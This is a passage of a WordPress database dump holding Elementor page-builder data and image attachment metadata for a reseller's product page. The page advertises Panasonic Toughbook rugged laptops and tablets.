anywhere.<\\/p><\\/div><\\/div><\\/div><p>\\u00a0<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><\\/div><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><\\/div><p>\\u00a0<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p>\\u00a0<\\/p><\\/div><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3306,2594,'_wp_attached_file','2018/12/tb_33_hero.png'),(3307,2594,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:418;s:6:\"height\";i:389;s:4:\"file\";s:22:\"2018/12/tb_33_hero.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"tb_33_hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"tb_33_hero-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"tb_33_hero-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"tb_33_hero-418x300.png\";s:5:\"width\";i:418;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"tb_33_hero-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3308,2595,'_wp_attached_file','2018/12/tb_54_hero.png'),(3309,2595,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:418;s:6:\"height\";i:389;s:4:\"file\";s:22:\"2018/12/tb_54_hero.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"tb_54_hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"tb_54_hero-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"tb_54_hero-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"tb_54_hero-418x300.png\";s:5:\"width\";i:418;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"tb_54_hero-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3310,2596,'_wp_attached_file','2018/12/20mk2_laptop_right_angle_detached-1.jpg'),(3311,2596,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:518;s:6:\"height\";i:389;s:4:\"file\";s:47:\"2018/12/20mk2_laptop_right_angle_detached-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"20mk2_laptop_right_angle_detached-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"20mk2_laptop_right_angle_detached-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:47:\"20mk2_laptop_right_angle_detached-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:47:\"20mk2_laptop_right_angle_detached-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:45:\"20mk2_laptop_right_angle_detached-1-20x15.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3312,2597,'_wp_attached_file','2018/12/toughpad-q2-hero.png'),(3313,2597,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:390;s:6:\"height\";i:370;s:4:\"file\";s:28:\"2018/12/toughpad-q2-hero.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"toughpad-q2-hero-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"toughpad-q2-hero-300x285.png\";s:5:\"width\";i:300;s:6:\"height\";i:285;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"toughpad-q2-hero-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"toughpad-q2-hero-390x300.png\";s:5:\"width\";i:390;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"toughpad-q2-hero-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3319,2598,'_elementor_version','0.4'),(3322,2599,'_elementor_edit_mode','builder'),(3323,2599,'_elementor_template_type','post'),(3324,2599,'_wp_page_template','template-fullwidth.php'),(3325,2599,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><\\/div><p>\\u00a0<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><\\/div><\\/div><\\/div><p>\\u00a0<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><\\/div><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><\\/div><p>\\u00a0<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p>\\u00a0<\\/p><\\/div><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3326,2599,'_elementor_version','0.4'),(3345,2605,'_elementor_edit_mode','builder'),(3346,2605,'_elementor_template_type','post'),(3347,2605,'_wp_page_template','template-fullwidth.php'),(3348,2605,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" 